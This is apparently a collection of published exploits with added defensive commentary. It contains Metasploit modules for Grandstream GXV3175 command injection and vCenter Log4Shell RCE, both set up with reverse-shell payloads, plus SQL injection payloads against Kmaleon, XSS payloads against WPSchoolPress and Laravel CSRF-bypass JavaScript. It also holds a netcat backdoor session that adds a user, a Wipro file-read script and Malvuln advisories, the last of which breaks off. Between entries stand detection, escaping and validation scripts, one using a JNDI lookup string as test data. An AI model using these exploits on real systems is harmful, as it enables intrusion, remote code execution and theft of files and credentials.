<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
        'Description' => %q{
          This module exploits a command injection vulnerability in Grandstream GXV3175
          IP multimedia phones. The 'settimezone' action does not validate input in the
          'timezone' parameter allowing injection of arbitrary commands.

          A buffer overflow in the 'phonecookie' cookie parsing allows authentication
          to be bypassed by providing an alphanumeric cookie 93 characters in length.

          This module was tested successfully on Grandstream GXV3175v2
          hardware revision V2.6A with firmware version 1.0.1.19.
        },
        'Author' => [
          'alhazred', # Command injection vulnerability discovery and exploit
          'Brendan Scarvell', # Auth bypass discovery
          'bcoles' # Metasploit
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'References' => [
          [ 'CVE', '2019-10655' ],
          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
          [ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        },
        'DisclosureDate' => '2016-09-01',
        'Privileged' => true,
        'Arch' => ARCH_ARMLE,
        'DefaultOptions' => {
          'PrependFork' => true,
          'MeterpreterTryToFork' => true,
          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget'
        },
        'CmdStagerFlavor' => %w[wget],
        'Targets' => [
          ['Automatic', {}]
        ],
        'DefaultTarget' => 0
      )
    )
  end

  def check
    res = send_request_cgi(
      'uri' => '/manager',
      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
      'vars_get' => {
        'action' => 'settimezone',
        'timezone' => ''
      }
    )

    if res && res.code == 200 && res.body.to_s.include?('Response=Success')
      return CheckCode::Detected('phonecookie authentication bypassed successfully.')
    end

    CheckCode::Safe
  end

  def execute_command(cmd, _opts)
    res = send_request_cgi(
      'uri' => '/manager',
      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
      'vars_get' => {
        'action' => 'settimezone',
        'timezone' => "`#{cmd}`"
      }
    )
    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end
    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
    end
    unless res.body.to_s.include?('Response=Success')
      fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
    end
  end

  def exploit
    execute_cmdstager(
      linemax: 220, # 255 minus URL encoding
      background: true
    )
  end
end
</code></pre>
<pre><code># Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)
# Google Dork: intitle: "Inicio de Sesión - Kmaleon"
# Date: 2021-11-05
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.levelprograms.com
# Software Link: https://www.levelprograms.com/kmaleon-abogados/
# Version: v1.1.0.205
# Tested on: Linux

# Description:
# The Kmaleon application from levelprogram is vulnerable to
# SQL injection via the 'tipocomb' parameter on the kmaleonW.php page

==================== 1. SQLi ====================

http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true

The 'tipocomb' parameter is vulnerable to SQL injection.

GET parameter 'tipocomb' is vulnerable.

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::JndiInjection
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::CheckModule
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(_info = {})
    super(
      'Name' => 'VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)',
      'Description' => %q{
        VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server
        that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
        command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on
        Windows.

        This module will start an LDAP server that the target will need to connect to. This exploit uses the logon page
        vector.
      },
      'Author' => [
        'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff
        'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
        'jbaines-r7', # vCenter research
        'w3bd3vil' # vCenter PoC https://twitter.com/w3bd3vil/status/1469814463414951937
      ],
      'References' => [
        [ 'CVE', '2021-44228' ],
        [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],
        [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0028.html' ],
        [ 'URL', 'https://twitter.com/w3bd3vil/status/1469814463414951937' ]
      ],
      'DisclosureDate' => '2021-12-09',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true,
        'SRVPORT' => 389,
        'WfsDelay' => 30,
        'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
      },
      'Targets' => [
        [
          'Windows', {
            'Platform' => 'win'
          },
        ],
        [
          'Linux', {
            'Platform' => 'unix',
            'Arch' => [ARCH_CMD],
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_bash'
            }
          },
        ]
      ],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'AKA' => ['Log4Shell', 'LogJam'],
        'Reliability' => [REPEATABLE_SESSION],
        'RelatedModules' => [
          'auxiliary/scanner/http/log4shell_scanner',
          'exploit/multi/http/log4shell_header_injection'
        ]
      }
    )
    register_options([
      OptString.new('TARGETURI', [ true, 'Base path', '/'])
    ])
  end

  def check
    validate_configuration!

    return Exploit::CheckCode::Unknown if tenant.nil?

    super
  end

  def check_options
    {
      'LDAP_TIMEOUT' => datastore['WfsDelay'],
      'HTTP_HEADER' => 'X-Forwarded-For',
      'TARGETURI' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',
      'HEADERS_FILE' => nil,
      'URIS_FILE' => nil
    }
  end

  def build_ldap_search_response_payload
    return [] if @search_received

    @search_received = true

    print_good('Delivering the serialized Java object to execute the payload...')
    build_ldap_search_response_payload_inline('BeanFactory')
  end

  def tenant
    return @tenant unless @tenant.nil?

    res = send_request_cgi('uri' => normalize_uri(target_uri, 'ui', 'login'))
    return nil unless res&.code == 302
    return nil unless res.headers['Location'] =~ %r{websso/SAML2/SSO/([^/]+)\?}

    @tenant = Regexp.last_match(1)
  end

  def trigger
    @search_received = false
    # HTTP request initiator
    send_request_cgi(
      'uri' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',
      'headers' => { 'X-Forwarded-For' => jndi_string }
    )
  end

  def exploit
    validate_configuration!

    start_service
    trigger

    sleep(datastore['WfsDelay'])
    handler
  ensure
    cleanup
  end
end
</code></pre>
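<p>Both Metasploit modules above carry IOC_IN_LOGS in their notes, and both attacks leave a recognisable shape in a request log: the Grandstream one a <code>settimezone</code> request to <code>/manager</code> whose <code>timezone</code> value contains shell metacharacters and whose <code>phonecookie</code> is far longer than a real cookie, the vCenter one a JNDI lookup string inside a request header such as <code>X-Forwarded-For</code>. The detection pass below is an added example, not code from either module or from Rapid7. It assumes a JSON-lines request log with <code>path</code>, <code>query</code>, <code>cookie</code> and <code>headers</code> fields (an assumption for this example; adapt the loader to your own log format) and uses constructed sample lines.</p>

```python
"""Flag requests matching the two attack patterns described above.

Added example (not part of either Metasploit module). Input is a constructed
JSON-lines request log, one object per request with "path", "query", "cookie"
and "headers"; the field names are an assumption for this example.
"""
import json
import re
from urllib.parse import parse_qs

# Shell metacharacters that never appear in a timezone name such as "Europe/Berlin".
SHELL_META = re.compile(r"[`$;|&<>\n]")
# Log4j lookup prefix; case-insensitive because the lookup syntax is.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)
# Cookie length the advisory above gives as the overflow trigger; lower it if
# you know the legitimate cookie length on your phones.
PHONECOOKIE_LIMIT = 93


def parse_cookie_header(cookie_header):
    """Return {name: value} from a Cookie header, stripping surrounding quotes."""
    jar = {}
    for part in cookie_header.split(";"):
        if "=" not in part:
            continue
        name, _, value = part.strip().partition("=")
        jar[name.strip()] = value.strip().strip('"')
    return jar


def findings_for(req):
    """Return the list of rule names a single request triggers."""
    hits = []
    params = parse_qs(req.get("query", ""))
    if req.get("path") == "/manager" and params.get("action") == ["settimezone"]:
        tz = params.get("timezone", [""])[0]
        if SHELL_META.search(tz):
            hits.append("settimezone-command-injection")
        cookie = parse_cookie_header(req.get("cookie", ""))
        if len(cookie.get("phonecookie", "")) >= PHONECOOKIE_LIMIT:
            hits.append("phonecookie-overflow-length")
    for name, value in req.get("headers", {}).items():
        if JNDI_LOOKUP.search(value):
            hits.append("jndi-lookup-in-header:" + name)
    return hits


def scan_log(lines):
    """Return [(line_number, [finding, ...]), ...] for lines with at least one finding."""
    results = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            req = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip it rather than crash the scanner
        hits = findings_for(req)
        if hits:
            results.append((n, hits))
    return results


# Constructed sample log: one benign request, then one request per attack pattern.
SAMPLE_LOG = [
    json.dumps({"path": "/manager", "query": "action=settimezone&timezone=Europe/Berlin",
                "cookie": 'phonecookie="abc123"', "headers": {}}),
    json.dumps({"path": "/manager", "query": "action=settimezone&timezone=`id`",
                "cookie": 'phonecookie="' + "A" * 93 + '"', "headers": {}}),
    json.dumps({"path": "/websso/SAML2/SSO/vsphere.local", "query": "SAMLRequest=",
                "cookie": "", "headers": {"X-Forwarded-For": "${jndi:ldap://example.invalid/a}"}}),
]

if __name__ == "__main__":
    for line_no, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits)}")
```

<p>The header rule is deliberately broad (any header, not only <code>X-Forwarded-For</code>) because the related <code>log4shell_header_injection</code> module listed in the notes tries other headers; the cookie rule fires on length alone, since the advisory says any alphanumeric value of that length bypasses authentication.</p>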
<pre><code># Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS)
# Date: 20/08/2021
# Exploit Author: Davide Taraschi
# Vendor Homepage: https://wpschoolpress.com/
# Software Link: https://wpschoolpress.com/free-download/
# Version: up to 2.1.17 (not included)
# Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2
# CVE : CVE-2021-24664

# Description:
The plugin sanitises some fields using a WordPress built-in function called sanitize_text_field() but does not correctly escape them before outputting them in attributes, resulting in Stored Cross-Site Scripting issues.
The function wp_sanitize_text_field() escapes < and > but does not escape characters like ", allowing an attacker to break out of an HTML input tag and inject arbitrary JavaScript.

# PoC:
As admin,
- Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)//
The XSS will be triggered when adding another teacher attendance by clicking on the Add button

- Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button

- Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)//
The XSS will be triggered when editing the created Subject Mark (i.e. /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3)

- Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)//
The XSS will be triggered when editing the Subject

- Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)//
The XSS will be triggered when editing the Exam

Note that some of these XSS issues can be executed by a teacher (medium-privileged user), but since WordPress uses HttpOnly cookies it is impossible to steal cookies.
</code></pre>
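<p>The root cause the advisory describes is a context mismatch: a sanitiser that neutralises angle brackets protects text content, but inside a quoted attribute the dangerous character is the quote. The example below is added here and is neither the plugin's nor WordPress's code; it mimics an angle-bracket-only sanitiser, renders one of the advisory's payloads into an <code>input</code> attribute with and without proper attribute escaping, and uses Python's own HTML parser to show which attributes a browser-side parser would end up with.</p>

```python
"""Why stripping '<' and '>' is not enough inside an HTML attribute.

Added example, not part of the advisory or the plugin. It contrasts a
sanitiser that only neutralises angle brackets (the behaviour the advisory
describes) with proper attribute escaping, using one of the advisory's
payloads, and inspects the resulting attributes with Python's HTML parser.
"""
import html
from html.parser import HTMLParser

# Payload from the advisory above.
PAYLOAD = '" autofocus onfocus=alert(/XSS/)//'


def strip_angle_brackets(value):
    """Mimics a sanitiser that only removes tag delimiters; quotes survive."""
    return value.replace("<", "").replace(">", "")


def render_input_unsafe(value):
    """Stored value interpolated into an attribute after angle-bracket stripping only."""
    return '<input type="text" name="reason" value="%s">' % strip_angle_brackets(value)


def render_input_safe(value):
    """Same markup, but the value is escaped for the attribute context (quotes included)."""
    return '<input type="text" name="reason" value="%s">' % html.escape(value, quote=True)


class _AttrCollector(HTMLParser):
    """Records the attributes of the first <input> tag it sees."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input" and not self.attrs:
            self.attrs = dict(attrs)


def input_attributes(markup):
    """Return the attribute dict a parser would see on the <input> element."""
    p = _AttrCollector()
    p.feed(markup)
    return p.attrs


def has_event_handler(markup):
    """True when any on* attribute made it onto the element."""
    return any(name.startswith("on") for name in input_attributes(markup))


if __name__ == "__main__":
    print("unsafe:", input_attributes(render_input_unsafe(PAYLOAD)))
    print("safe:  ", input_attributes(render_input_safe(PAYLOAD)))
```

<p>With the unsafe renderer the parser reports <code>autofocus</code> and <code>onfocus</code> as separate attributes; with quote-aware escaping the whole payload stays inside <code>value</code>. The PHP equivalent of the safe path is escaping at output time with a function meant for attribute context, separately from whatever sanitisation happens on input.</p>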
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/5dfa998f62612e10d5d28d26948dd50f.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Ransomware Builder Babuk
Vulnerability: Insecure Permissions
Description: The malware creates directories with insecure permissions when writing to the c:\ drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable, then wait for a privileged user to log on to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 5dfa998f62612e10d5d28d26948dd50f
Vuln ID: MVID-2022-0461
Disclosure: 01/19/2022


Exploit/PoC:
C:\>builder.exe
Usage: builder.exe FolderName

C:\>builder.exe c:\hate
Creating folder 'c:\hate'
curve25519 keys generated.
"c:\hate\e_win.exe" written!
"c:\hate\d_win.exe" written!
"c:\hate\e_esxi.out" written!
"c:\hate\d_esxi.out" written!
"c:\hate\e_nas_x86.out" written!
"c:\hate\d_nas_x86.out" written!
"c:\hate\e_nas_arm.out" written!
"c:\hate\d_nas_arm.out" written!
"c:\hate\kp.curve25519" written!
"c:\hate\ks.curve25519" written!
Press any key to continue . . .

C:\>cacls \hate
C:\hate BUILTIN\Administrators:(OI)(CI)(ID)F
        NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
        BUILTIN\Users:(OI)(CI)(ID)R
        NT AUTHORITY\Authenticated Users:(ID)C
        NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
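<p>The <code>cacls</code> listing above is the whole finding: the two <code>NT AUTHORITY\Authenticated Users</code> entries carry <code>C</code> (Change), so any logged-on user can overwrite what the builder dropped. The same condition shows up in legitimate software that creates world-writable directories on the system drive, so it is worth having a parser for that output format. The script below is an added example, not part of the advisory; it parses the text <code>cacls</code> prints (the advisory's own output is used as the constructed sample) and reports entries where a broad principal holds a write-capable right.</p>

```python
"""Flag write-capable ACEs granted to broad groups in cacls output.

Added example, not part of the advisory. It parses the text format cacls
prints (the output shown above is used as the constructed sample) and reports
entries where a low-privilege principal holds Full (F), Change (C) or Write
(W) access, which is what lets a standard user replace the dropped binaries.
"""
import re

# Principals every local user belongs to; write access here means "anyone can write".
BROAD_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
WRITE_RIGHTS = {"F", "C", "W"}

# PRINCIPAL:(FLAG)(FLAG)RIGHT   e.g.  NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
ACE_RE = re.compile(r"^(?P<who>[^:]+?):(?P<flags>(?:\([A-Z]+\))*)(?P<right>[A-Z]+)$")


def parse_cacls(output, path):
    """Return [(principal, flags, right)] from cacls output for one path."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):          # the first line carries the path prefix
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:                          # "special access:" blocks and blanks are skipped
            continue
        aces.append((m.group("who"), m.group("flags"), m.group("right")))
    return aces


def weak_aces(output, path):
    """ACEs that give a broad principal write-capable access."""
    return [
        (who, flags, right)
        for who, flags, right in parse_cacls(output, path)
        if who.lower() in BROAD_PRINCIPALS and right in WRITE_RIGHTS
    ]


# Constructed sample: the cacls output from the advisory above.
SAMPLE = """C:\\hate BUILTIN\\Administrators:(OI)(CI)(ID)F
           NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F
           BUILTIN\\Users:(OI)(CI)(ID)R
           NT AUTHORITY\\Authenticated Users:(ID)C
           NT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C
"""

if __name__ == "__main__":
    for who, flags, right in weak_aces(SAMPLE, "C:\\hate"):
        print(f"WEAK: {who} has {right} {flags}")
```

<p>The path is passed in explicitly rather than guessed from the first token, because directory names can contain spaces while the ACE text never contains a colon before the rights. Run on live output, feed it <code>cacls &lt;dir&gt;</code> captured to a file.</p>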
<pre><code># Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux
# Description: We can bypass Laravel's image file upload functionality to upload arbitrary files on the web server,
# which lets us run arbitrary JavaScript and bypass the CSRF token. For more information read this one: https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b
# Steps to reproduce:
1- Use the HxD tool and add FF D8 FF E0 at the very beginning of your file
2- Use the code below to bypass the CSRF token
ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
// Target of the forged POST; edit as you want (declared before it is used)
var POST_URL = "/";

function submitFormWithTokenJS(token) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", POST_URL, true);
  // Send the proper header information along with the request
  xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  // This is for debugging and can be removed
  xhr.onreadystatechange = function() {
    if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
      console.log(xhr.responseText);
    }
  };
  xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
  var xhr = new XMLHttpRequest();
  // This tells it to return the response as an HTML document
  xhr.responseType = "document";
  // true at the end makes the call asynchronous
  // Edit the path as you want
  xhr.open("GET", "/image-upload", true);
  xhr.onload = function (e) {
    if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
      // Get the document from the response
      var page = xhr.response;
      // Get the input element
      var input = page.getElementsByTagName("input")[0];
      // Show the token
      alert("The token is: " + input.value);
      // Use the token to submit the form
      submitFormWithTokenJS(input.value);
    }
  };
  // Make the request
  xhr.send(null);
}

getTokenJS();
</script>
</body>
</html>
3- Save it as an HTML file and upload it.
</code></pre>
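<p>The bypass works because a check that only looks at the first bytes of an upload is satisfied by the four-byte JPEG prefix, after which the file is plain HTML that the server later serves from its own origin. The example below is added here and is not Laravel's validation code; it shows the magic-byte check beside a structural one that walks the JPEG marker segments and requires a sane length on each, a Start-of-Scan segment and a trailing End-of-Image marker. Both sample inputs are constructed inline; the tiny JPEG is the minimum this walker needs, not a decodable picture.</p>

```python
"""Reject "images" that only carry a JPEG magic number.

Added example, not Laravel's own validation code. A check that looks only at
the first bytes accepts the file built in the steps above (FF D8 FF E0
followed by HTML). Walking the JPEG segment chain instead requires that every
marker segment has a plausible length and that Start-of-Scan and End-of-Image
markers are present, which the HTML payload does not satisfy. Sample inputs
are constructed inline.
"""

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, SOI, EOI, *range(0xD0, 0xD8)}  # markers without a length field


def magic_only_check(data):
    """The weak check: the first bytes look like a JPEG, nothing else is examined."""
    return data[:4] in (b"\xff\xd8\xff\xe0", b"\xff\xd8\xff\xe1", b"\xff\xd8\xff\xdb")


def is_structurally_jpeg(data):
    """Walk marker segments from SOI to SOS and require a trailing EOI."""
    if len(data) < 4 or data[:2] != b"\xff\xd8":
        return False
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return False                      # expected a marker here
        marker = data[pos + 1]
        if marker == 0xFF:                    # fill byte, keep scanning
            pos += 1
            continue
        if marker in STANDALONE:
            if marker == EOI:
                return False                  # EOI before any scan data: not an image
            pos += 2
            continue
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(data):
            return False                      # bogus length field (for the PoC, "<h" = 0x3C68)
        if marker == SOS:
            # Entropy-coded data follows; the file must end with EOI.
            return data.rstrip(b"\x00").endswith(b"\xff\xd9")
        pos += 2 + length
    return False


def accept_upload(filename, data):
    """Accept only .jpg/.jpeg uploads whose bytes parse as a JPEG."""
    if not filename.lower().endswith((".jpg", ".jpeg")):
        return False
    return is_structurally_jpeg(data)


# Constructed sample: the smallest JPEG-shaped file this check requires
# (APP0/JFIF segment, SOS segment, one byte of scan data, EOI).
MINIMAL_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x00"
    + b"\xff\xd9"
)
# Constructed sample: the technique from the steps above, magic bytes then HTML.
HTML_WITH_MAGIC = b"\xff\xd8\xff\xe0" + b"<html><head><title>x</title></head></html>"

if __name__ == "__main__":
    for name, blob in (("real.jpg", MINIMAL_JPEG), ("fake.jpg", HTML_WITH_MAGIC)):
        print(name, "magic-only:", magic_only_check(blob), "structural:", accept_upload(name, blob))
```

<p>Structural parsing (or a full decode with an image library) raises the bar, but a carefully built polyglot can still satisfy a parser, so the control that actually removes the XSS-to-CSRF chain is on the serving side: store uploads outside the web root or on a separate origin, send them with <code>X-Content-Type-Options: nosniff</code> and a <code>Content-Type</code> derived from the validated format rather than from the request, and never let an uploaded file be served as <code>text/html</code>.</p>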
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/57bda78cc5fd6a06017148bae28e8e39.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Wisell
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 5277. Third-party attackers who can reach an infected system can run any OS commands, further compromising the host.
Type: PE32
MD5: 57bda78cc5fd6a06017148bae28e8e39
Vuln ID: MVID-2022-0460
Disclosure: 01/19/2022

Exploit/PoC:
nc64.exe x.x.x.x 5277
WinShell v1.0 - '!' to quit, 'enter' to shell...
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami
whoami
desktop-2c3iqho\victim

C:\dump>net user HYP3RLINX 666 /add
net user HYP3RLINX 666 /add
The command completed successfully.
</code></pre>
<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Read PoC
# Date: 05/08/2021
# Exploit Author: Rizal Muhammed @ub3rsick
# Vendor Homepage: https://www.wipro.com/holmes/
# Version: 20.4.1
# Tested on: Windows 10 x64
# CVE : CVE-2021-38146

import requests as rq
import argparse

port = 8001  # change port if application is running on different port


def file_download(host, filepath):
    vuln_url = "http://%s:%s/home/download" % (host, port)
    data = {
        "SearchString": filepath,
        "Msg": ""
    }

    hdr = {
        "content-type": "application/json"
    }

    resp = rq.post(vuln_url, headers=hdr, json=data)

    print(resp.text)


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2021-38146 - Wipro Holmes Orchestrator 20.4.1 Unauthenticated Arbitrary File Download",
        epilog="Vulnerability Discovery and PoC Author - Rizal Muhammed @ub3rsick"
    )
    parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True)
    parser.add_argument("-f", "--file-path", help="Absolute Path of the file to download", default="C:/Windows/Win.ini")
    args = parser.parse_args()

    # The service expects forward slashes; normalise any backslashes in the supplied path
    if "\\" in args.file_path:
        fp = args.file_path.replace("\\", "/")
    else:
        fp = args.file_path
    file_download(args.target_ip, fp)


if __name__ == "__main__":
    main()
</code></pre>
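<p>The PoC above hands the service an absolute path in <code>SearchString</code> and receives the file, which means the download handler uses the parameter as a filesystem path with no anchoring and no authentication. The function below is an added example, not Wipro's code, of how a download handler should treat such a parameter: as a name relative to one fixed export directory, refusing absolute paths and drive letters in either slash style and checking the resolved location after normalisation. The export directory name is an assumption for the example; authentication and authorisation of the caller are a separate, prior check.</p>

```python
"""Constrain a file-download parameter to one directory.

Added example, not Wipro's code. The PoC above sends an absolute path in
"SearchString" and gets the file back. A download handler should treat the
parameter as a name relative to a fixed export directory, refuse absolute
paths and drive letters in either slash style, and verify the resolved
location after normalisation. The base directory name is an assumption.
"""
import posixpath
from pathlib import PurePosixPath, PureWindowsPath

EXPORT_DIR = "/srv/holmes/exports"   # assumed location of legitimately downloadable files


def resolve_download(requested, base_dir=EXPORT_DIR):
    """Return the absolute path to serve, or None if the request must be refused."""
    if not requested or "\x00" in requested:
        return None
    candidate = requested.replace("\\", "/")   # the PoC shows the service accepts either slash
    # Absolute in POSIX terms (/etc/passwd) or Windows terms (C:/Windows/Win.ini, //server/share,
    # or a drive-relative C:file); all of these escape the export directory.
    if (PurePosixPath(candidate).is_absolute()
            or PureWindowsPath(candidate).is_absolute()
            or PureWindowsPath(candidate).drive):
        return None
    normalised = posixpath.normpath(candidate)
    if normalised in (".", "..") or normalised.startswith("../"):
        return None                            # empty target or climbs out of the base directory
    full = posixpath.normpath(posixpath.join(base_dir, normalised))
    # Belt and braces: after joining, the result must still sit inside base_dir.
    if posixpath.commonpath([base_dir, full]) != base_dir or full == base_dir:
        return None
    return full


if __name__ == "__main__":
    for req in ("C:/Windows/Win.ini", "..\\..\\etc\\passwd", "reports/q1.pdf"):
        print(f"{req!r:28} -> {resolve_download(req)}")
```

<p>Normalisation happens before the containment check on purpose: checking <code>startswith(base_dir)</code> on the raw string would pass <code>reports/../../secret</code>. Serving the file should then open the returned path with no further string manipulation.</p>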
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: CollectorStealerBuilder v2.0.0 Panel
Vulnerability: Man-in-the-Middle (MITM)
